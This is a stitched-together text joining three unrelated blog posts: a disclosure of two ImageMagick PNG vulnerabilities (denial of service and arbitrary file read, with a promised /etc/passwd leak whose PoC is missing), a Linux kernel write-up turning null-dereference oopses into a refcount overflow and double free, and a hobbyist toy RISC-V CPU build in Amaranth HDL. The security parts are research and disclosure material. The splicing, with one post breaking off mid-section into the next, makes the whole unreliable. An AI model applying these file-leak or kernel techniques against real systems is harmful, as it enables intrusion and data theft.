ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and, therefore, is very common to find it in websites worldwide since there is always a need to process pictures for users’ profiles, catalogs, etc.
In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:
CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).
How to trigger the exploitation?
An attacker needs to upload a malicious image to a website using ImageMagick, in order to exploit the above mentioned vulnerabilities remotely.
The Ocelot team is very grateful for the team of volunteers of ImageMagick, who validated and released the patches needed in a timely manner:
In this blog, the technical details of the vulnerabilities are explained.
CVE-2022-44267: Denial of service
ImageMagick: 7.1.0-49
When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process could be left waiting for stdin input leading to a Denial of Service since the process won’t be able to process other images.
A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile. If the specified filename is “-“ (a single dash) ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164)
Reading “tEXt” chunk:
SetImageProfile (MagickCore/property.c:4360):Checking if keyword equals to “profile”:Copying the text string as filename in line 4720 and saving the content in line 4722:FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if magick binary has permissions to read it).
A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164):
– Reading tEXt chunk:
SetImageProfile (MagickCore/property.c:4360)
Checking if keyword equals to “profile”
Copying the text string as filename in line 4720 and saving the content in line 4722:
FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:
This new image will be available to download by the attackers with the arbitrary website file content embedded inside.
PoC: Malicious PNG content to leak “/etc/passwd” file:
For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.
Kernel oops overview
At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.
The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.
Reference count mismanagement overview
Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 232 times.
Example null-deref bug
When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:
static int show_smaps_rollup(struct seq_file *m, void *v)
{
struct proc_maps_private *priv = m->private;
struct mem_size_stats mss;
struct mm_struct *mm;
struct vm_area_struct *vma;
unsigned long last_vma_end = 0;
int ret = 0;
priv->task = get_proc_task(priv->inode); //task reference taken
if (!priv->task)
return -ESRCH;
mm = priv->mm; //With no vma's, mm->mmap is NULL
if (!mm || !mmget_not_zero(mm)) { //mm reference taken
ret = -ESRCH;
goto out_put_task;
}
memset(&mss, 0, sizeof(mss));
ret = mmap_read_lock_killable(mm); //mmap read lock taken
if (ret)
goto out_put_mm;
hold_task_mempolicy(priv);
for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
smap_gather_stats(vma, &mss);
last_vma_end = vma->vm_end;
}
show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
seq_pad(m, ' ');
seq_puts(m, "[rollup]\n");
__show_smap(m, &mss, true);
release_task_mempolicy(priv);
mmap_read_unlock(mm);
out_put_mm:
mmput(mm);
out_put_task:
put_task_struct(priv->task);
priv->task = NULL;
return ret;
}
This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):
This kernel oops will mean that the following events occur:
The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
The task struct associated with the smaps_rollup file will have a refcount leaked
The mm_struct’s mm_users refcount associated with the task will be leaked
The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)
Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.
The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:
We cannot call this syscall from the task with the empty vma list itself — in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.
Our final refcount leaking overflow strategy is as follows:
Process A forks a process B
Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
Proces B clones with CLONE_VM | CLONE_PTRACE another process C
Process B munmap’s its entire virtual memory address space — this also unmaps process C’s virtual memory address space.
Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
(D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
Process A goes back to step 5 ~232 times
The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 232 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
Exploitation
Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:
Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.
However, before the call permanently deadlocks, it will call several other functions:
uprobe_clear_state
exit_aio
ksm_exit
khugepaged_exit
Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.
This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:
void exit_aio(struct mm_struct *mm)
{
struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
struct ctx_rq_wait wait;
int i, skipped;
if (!table)
return;
atomic_set(&wait.count, table->nr);
init_completion(&wait.comp);
skipped = 0;
for (i = 0; i < table->nr; ++i) {
struct kioctx *ctx =
rcu_dereference_protected(table->table[i], true);
if (!ctx) {
skipped++;
continue;
}
ctx->mmap_size = 0;
kill_ioctx(mm, ctx, &wait);
}
if (!atomic_sub_and_test(skipped, &wait.count)) {
/* Wait until all IO for the context are done. */
wait_for_completion(&wait.comp);
}
RCU_INIT_POINTER(mm->ioctx_table, NULL);
kfree(table);
}
While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:
Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.
Conclusion
While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.
I always wanted to understand how a CPU works, how it transitions from one instruction to the next and makes a computer work. So after reading Ken Shirrif’s blog about a bug fix in the 8086 processor I thought: Well, let’s try to write one in a hardware description language. This post is a write up of my learning experiment.
I’ll walk through my steps of creating an emulator, compiling and linking C for bare metal, CPU design and finally the implementation of my toy RISC-V CPU.
Goals
implement a CPU in a hardware description language (HDL),
code must be synthesizable (except memory),
simulate it,
and run a bare metal C program on it.
While I had plenty research time, I had only about 30 hours of development time. Without prior hardware design experience the goals had to be simple enough:
RISC V Integer instruction set only (minus system and break calls),
In a future iteration I plan to run my project on a real FPGA and implement a memory controller. Let’s say I made it to about 85% of what I wanted to achieve.
Write an emulator
Writing an emulator, i.e. a program that can execute the instructions of a CPU, is an excellent stepping stone towards a hardware implementation. For me — without a hardware background — it is much easier to reason about and learn the instruction set.
So my first step was to understand the RISC V instruction set. The RISC V specification is quite long, but I only needed chapters 2 (integer instruction set), 19 (RV32 / 64G instruction set listings) and 20 (assembly programmer’s handbook). These give detailed definitions of how each instruction must be executed, what kind of registers must be implemented, etc.
Let’s look at an example: Arithmetic / logical instructions operating on a register and an immediate value. For
ADDI
(add immediate) the following is done:
rd <- rs1 + imm
: The register identified by rd is set to the sum of the value stored in register rs1 and the value given in the instruction itself.
The emulator is implemented in C++ with a C-style interface in a shared library. This makes it easy to hook it into Python via cffi. This saved me quite a bit of time for file system and user interactions, which were all done in Python.
function, which executes exactly one instruction and then returns. In RISC V each instruction is exactly 32 bits. It first decodes the op code (what kind of operation) and then the specific operation (e.g. ADD immediate). It’s a large, nested switch.
The mathematical and logical operations are simplest to implement, so I started with them. Iteratively I’ve added branches, jumps and the remaining logic until I had covered all instructions other than
ECALL
and
EBREAK
. These two were not necessary for my bare metal experiment.
For testing I relied on simple hand-written assembly code. Of course this did not exercise my emulator thoroughly. So as a next step I wanted to finally run my Conway’s game of life simulation.
Cross compiling, linking and ELF to bin
Going from C to a bare metal CPU takes a few steps: cross compile, ensure proper memory layout and converting the ELF file to a binary blob. Also instead of having a
main
function my code has a
_start
function defined as follows:
void __attribute__((section (".text.boot"))) _start() {
run(); // call the actual "entrypoint"
}
I’ll explain the details later.
My CPU only supports the RISC-V 32 bit integer instruction set, but my host system is running on x86-64. So I needed a cross compiler and used the Ubuntu package
gcc-riscv64-unknown-elf
. Then I could compile my code using the following command:
set it’s architecture to rv32i, which is RISC-V 32bit integer instruction set
define the application binary interface, i.e. conventions how to emit assembly. This makes it so that integers, longs and pointers are 32 bit
these three are needed to emit code compatible with my emulator and later CPU
compile without a standard library
Standard libraries like the system libc assume operating system support, but my toy CPU will be running bare metal. So we have to switch that off. This means we won’t have access to
malloc
,
printf
,
puts
etc. Instead we’ll need to implement this ourselves, if we want to use it. This means we have no startup code either.
compile freestanding, that is, do not assume presence of a operating system or library and switch of libc specific optimizations and defaults
for example we won’t have a main function, which is otherwise required
use a memory map
we need to tell the compiler and linker where instructions and global variables will be placed in memory. We do not have a loader to do this at application startup
Even though we do not yet have any hardware, we must make a few decisions for item 6: how should our address space look like?
program execution starts at 0x1000, which below I’ll call rom for read-only-memory
memory for globals, stack variables and heap will be located at 0x10000000
These values are kind of arbitrary. I wanted to avoid having code at address zero to avoid issues with NULL pointers. This script also ensures that our program entry point, the function
_start
is placed at 0x1000, so that the emulator will execute that code first. Here’s my linker script for my address space setup:
ENTRY(_start)
MEMORY
{
rom (rx ): ORIGIN = 0x00001000, LENGTH = 16M
ram (rw): ORIGIN = 0x10000000, LENGTH = 32M
}
SECTIONS
{
.text : {
/*
entry point is expected to be the first function here
--> we are assuming there's only a single function in the .text.boot segment and by convention that is "_start"
KEEP ensures that "_start" is kept here, even if there are no references to it
*/
KEEP(*(.text.boot))
/*
all other code follows
*/
*(.text*)
} > rom
.rodata : { *(.rodata*) } > rom
.bss : { *(.bss*) } > ram
}
Now the “problem” is that gcc generates an ELF and not just a stream of instructions. The Executable and Linkable Format is simplified a container to store executable code, data and metadata in a way that makes it easy to later load into memory. As specified by the memory map like the one above. Since my program is fairly it simple does not need memory initialization. So we can simply dump the RISC-V instructions from the .text segment into a binary file.
. The linker script instructs the toolchain to make sure this code is placed at 0x1000, even when no other code references it. By having exactly one function in
.text.boot
this is guaranteed to happen.
Turns out this is still not enough to make the code work. The startup code above does not initialize the stack pointer, i.e. where local variables live in memory. I decided to simplify things and hard-code the initial stack pointer value in my emulator and CPU. This means simply setting register
x2
also known as
sp
to the end of the memory, here 0x12000000.
A couple other registers defined in the ABI with special purpose are not used by my program, so I did not implement support: global pointer
gp
and thread pointer
tp
.
No standard library
When the program is running on my host I rely on the standard library for memory allocation like
malloc
or
putchar
for output. But when running bare metal these functions are not available.
I’ve replaced dynamic memory allocation with static memory assignments. Since my program is the only one running on CPU, I can use all resources how I see fit. If the flag
FREESTANDING
is set, when the program is compiled for my RISC-V emulator / CPU. Without it, the program can run as-is on my host system like any other program.
for output to the console, my program assumes that the address of the variable
leds
is memory-mapped to an external LED array. In case of the emulator, it will simply read this memory area and display it on console. When running in the simulator (or FPGA in the next iteration), the memory controller will set output pins accordingly.
Emulator in action
Here’s the result of all of that work: First setting a breakpoint for each game of life cycle, and then manually stepping through the program on the emulated CPU.
Best viewed in full-screen mode due to web-unfriendly layout.
CPU overview
With the emulator completed I now have a working reference system to debug my CPU. And so I started working implementing it.
A simple CPU consists of the following components:
Arithmetic Logic Unit (ALU): the compute part, for operations like “add” or “xor”
Register File: provides and stores register values
Decoder: transform instruction to a set of control signals, controlling the CPU operation
Program Counter: manages the address where the next instruction is found
Load Store Unit (LSU): connects the CPU to its memory
Control Unit: tieing all the parts together to form a CPU
These are the basic elements of a CPU and sufficient for my toy RISC-V implementation.
Describing hardware in code
Hardware is designed with special programming languages, called hardware description languages (HDL). The most common ones are Verilog and VHDL. For my project I decided to use Amaranth HDL, because it’s higher level and easier to use — plus it’s written in my favorite language Python. Simplified it enables an engineer to describe a program in Python that generates a hardware description, instead of directly describing it directly in Verilog or VHDL. A nice property of Amaranth HDL is that by design the resulting programs are synthesizable, i.e. they can be “compiled” into a description executable in FPGAs or built as an ASIC.
A key difference between software and hardware is concurrency: In software code is executed line by line, in order and we need special constructs like threads to achieve parallelism. In hardware it’s different: Everything is happening at the same time. We are not describing high-level operations, but rather how logic gates are connected to each other.
Combinational logic
There are two key concepts in hardware: combinational logic (sometimes also called combinatorial logic) and synchronous logic. Simplified combinational logic executes all the time and all at the same time. In the following example green are input signals, yellow are internal signals (output of logic and input to the next logic), blue is logic and orange is the final output signal:
Combinational logic always updates its output immediately when any input changes. There are a couple physical limitations here, but we’ll simplify this for now. This means changing any signal will immediately change the output signal
sum
.
In Amaranth we can implement this as
# to run tests: python3 -m pytest add3.py
import pytest
from amaranth import Signal, Module, Elaboratable
from amaranth.build import Platform
from amaranth.sim import Simulator, Settle
class Add3Comb(Elaboratable):
def __init__(self):
self.count_1 = Signal(32)
self.count_2 = Signal(32)
self.count_3 = Signal(32)
self.result = Signal(32)
def elaborate(self, _: Platform) -> Module:
m = Module()
# technically this is not needed: a second `+` below would do
# but let's build the circuit exactly as shown above
temp_sum = Signal(32)
# define how our logic works
m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
m.d.comb += self.result.eq(self.count_3 + temp_sum)
return m
def test_add3comb():
# set up our device under test
dut = Add3Comb()
def bench():
# set inputs to defined values
yield dut.count_1.eq(7)
yield dut.count_2.eq(14)
yield dut.count_3.eq(21)
# let the simulation settle down, i.e. arrive at a defined state
yield Settle()
# check that the sum is the expected value
assert (yield dut.result) == 42
sim = Simulator(dut)
sim.add_process(bench)
sim.run()
are executed at the same time and also whenever the inputs change.
Synchronous Logic
There’s a second kind of commonly used logic: synchronous logic. The difference to combinational logic is that outputs only change on a clock edge. I.e. when the clock signal goes from low to high (positive edge) or vice versa (negative edge). Let’s use the adder example again. Colors as before, but we’ll use turquoise for synchronous logic.
We use positive edge triggered logic here. So unless the clock goes from low to high, both
temp sum
and
result
will never change. The following table shows how values change. Let’s furthermore assume the logic was just resetted, so outputs start at 0.
Changes highlighted in bold. This circuit takes on the expected value only after two full clock cycles. Even if the input signals are not defined in the time period after a positive edge and the next positive edge, this will not change the output in any way
Physically things are more complex (“delta time”) and this results in interesting tradeoffs between the length of combinational logic paths (number of gates, circuit length) and the attainable clock speed. Luckily this does not matter for my toy CPU.
In Amaranth we can implement this as
class Add3Sync(Elaboratable):
def __init__(self):
self.sync = ClockDomain("sync")
self.count_1 = Signal(32)
self.count_2 = Signal(32)
self.count_3 = Signal(32)
self.result = Signal(32)
def elaborate(self, _: Platform) -> Module:
m = Module()
temp_sum = Signal(32)
# define how our logic works
m.d.sync += temp_sum.eq(self.count_1 + self.count_2)
m.d.sync += self.result.eq(self.count_3 + temp_sum)
return m
def test_add3sync():
# set up our device under test
dut = Add3Sync()
def bench():
# set inputs to defined values
yield dut.count_1.eq(7)
yield dut.count_2.eq(14)
yield dut.count_3.eq(21)
# let the simulation settle down, i.e. arrive at a defined state
yield Settle()
# no positive edge yet, so still at reset value
assert (yield dut.result) == 0
# trigger a positive edge on the clock and wait for things to settle down
yield Tick()
yield Settle()
# count3 is reflect in output, since temp sum is still zero
assert (yield dut.result) == 21
yield Tick()
yield Settle()
# now both count3 and temp sum will be reflected in the output
assert (yield dut.result) == 42
sim = Simulator(dut)
sim.add_process(bench)
sim.add_clock(1e-6)
sim.run()
CPU design
Armed with this knowledge I figured out which things needed to happen in parallel and which things in sequence.
So if we have an ALU related instruction it would work like this:
in parallel
read instruction from ROM at the instruction address,
decode the instruction,
read register values and if present immediate value,
compute the result in the ALU,
assign ALU result to destination register (not yet visible!)
increment instruction address by 4 bytes (not yet visible!)
wait for positive clock edge, giving step 1 time to settle, and in the following instant
update instruction address, making the new value visible
update destination register value, making the new value visible
repeat, starting at 1.
Iteratively creating a diagrams of how things should work was immensely helpful. Below is a simplified version of my CPU design, though it lacks many of the control signals and special cases for operations related to jumping and branching. Please view in full screen mode, where you can also toggle ALU or LSU layers to make it easier to read. Colors here are just to help with readability of the diagram.
Now let’s talk about the CPU components in detail. Designing them reminded me a lot about functional programming, where the parameters of a function and types naturally guide the implementation. All necessary details about the RISC-V instruction set are specified in detail in the spec.
ALU
Compute
data1 $OPERATION data2
. I decided to merge the branch unit into the ALU, so there’s a branch for
is_branch
.
class ALU(Elaboratable):
def __init__(self):
# if set to 0, then normal ALU operation,
# otherwise treat funct3 as branch condition operator
self.i_is_branch = Signal(1)
# operation, e.g. "add" or "xor", from decoder
self.i_funct3 = Signal(3)
# sub-operation, e.g. "sub" for "add", from decodert
self.i_funct7 = Signal(7)
# value of register 1
self.i_data1 = SignedSignal(32)
# value of register 2 or immediate
self.i_data2 = SignedSignal(32)
# computation result
self.o_result = SignedSignal(32)
def elaborate(self, _: Platform) -> Module:
m = Module()
# this ALU also implements branch logic
with m.If(self.i_is_branch == 0):
# normal ALU
with m.Switch(self.i_funct3):
with m.Case(FUNCT3_OP_XOR):
m.d.comb += self.o_result.eq(self.i_data1 ^ self.i_data2)
with m.Case(FUNCT3_OP_SLL):
shift_amount = self.i_data2[0:5]
m.d.comb += self.o_result.eq(
self.i_data1.as_unsigned() << shift_amount)
# ...
In this snippet you can see how Amaranth is really a code generator: Instead of using the normal
switch
and
if
statements, which control Python flow, you have to use the
m.Switch
etc. methods on the module.
Decoder
Provide all necessary signals to control execution.
class InstructionDecoder(Elaboratable):
def __init__(self):
self.i_instruction = Signal(32)
self.i_instruction_address = Signal(32)
# select signals for register file
self.o_rs1 = Signal(5)
self.o_rs2 = Signal(5)
self.o_rd = Signal(5)
self.o_rd_we = Signal(1)
# ALU / LSU operations
self.o_funct3 = Signal(3)
self.o_funct7 = Signal(7)
# immediate value
self.o_imm = SignedSignal(32)
# control signals
self.o_invalid = Signal(1)
self.o_has_imm = Signal(1)
self.o_is_branch = Signal(1)
self.o_is_memory = Signal(2)
def elaborate(self, _: Platform) -> Module:
m = Module()
m.d.comb += self.o_invalid.eq(0)
m.d.comb += self.o_is_branch.eq(0)
opcode = self.i_instruction[0:7]
with m.Switch(opcode):
with m.Case(OPCODE_OP_IMM):
# rd = rs1 $OP imm
# use ALU with immediate
m.d.comb += [
self.o_rd.eq(self.i_instruction[7:12]),
self.o_rd_we.eq(1),
self.o_funct3.eq(self.i_instruction[12:15]),
self.o_rs1.eq(self.i_instruction[15:20]),
self.o_rs2.eq(0),
self.o_imm.eq(self.i_instruction[20:32]),
self.o_has_imm.eq(1),
self.o_funct7.eq(0),
]
# ...
Register File
Implement 32 registers. Special case: register
x0
is hard-wired to zero, by not allowing writes to it.
I’m not sure if this is the best implementation, but it works well in simulation so far.
The simplest component: we start executing programs at 0x1000 and then go to the next instruction. The decoder computes offset based on the instruction to allow both absolute and relative jumps.
I’m co-simulating this part, so there is no implementation. Also simulating even small amounts of memory turned out to be way to slow. I hope to find more time in the future to complete this part of the project. And then also run it with real memory on an FPGA instead of just in simulation.
But let’s at least discuss the most interesting aspect of memory: Memory is usually very slow compared to the CPU. So the CPU has to be stalled, i.e. wait, while we are waiting for the memory to execute the read or write. In my design I have defined an
o_done
signal. This signal tells the control unit to not advance the program counter until the result is available. Not sure if this is the best approach, but it works for now.
class LoadStoreUnit(Elaboratable):
def __init__(self):
self.sync = ClockDomain("sync")
# from decoder, not in spec, internal control signals
self.i_lsu_mode = Signal(2)
# from decoder, memory operation
self.i_funct3 = Signal(3)
# address
self.i_address_base = Signal(32)
self.i_address_offset = SignedSignal(12)
# reading / writing
self.i_data = Signal(32)
self.o_data = Signal(32)
#
self.o_done = Signal(1)
def elaborate(self, _: Platform) -> Module:
m = Module()
# empty by design: this is co-simulated
return m
Tieing it all together and testing it
The control unit connects all modules, as described in the simplified diagram above. And uses the control logic from the decoder to correctly advance the program counter.
Instead of showing the boring glue code, here’s how I’m testing the CPU via simulation. The assembly program is designed to set registers to certain values, that can be checked afterwards. It does not follow any ABI constraints.
My development time ran out before I completed the project, so no game of life on my toy CPU for now. So what’s missing?
memory mapped I/O, so that instead of keeping the LEDs in memory, signals / pins of the CPU are used,
adding support for a few missing read / write operations to the memory controller (read byte, write byte),
integrating the emulator and simulator, re-using the existing debugger user interface,
and then likely spending some time on debugging,
maybe porting the simulator to Verilator or another framework to make it fast enough.
But I thought having a blog post is much better than completing this experiment now. I hope to find time in the future to again work on this, finally run game of life on my CPU and actually run it in an FPGA. That would be fun.
But the best part is really: I’ve learned so much as you’ve read. Try it yourself. Thank you for reading 🙂
Full source code
You can find my source code at https://github.com/fnoeding/fpga-experiments . It’s not as clean as the snippets above, but I hope it provides additional context if you’d like to dive deeper.
Additional Material
If you want to learn more I’ve collected some links that helped me below: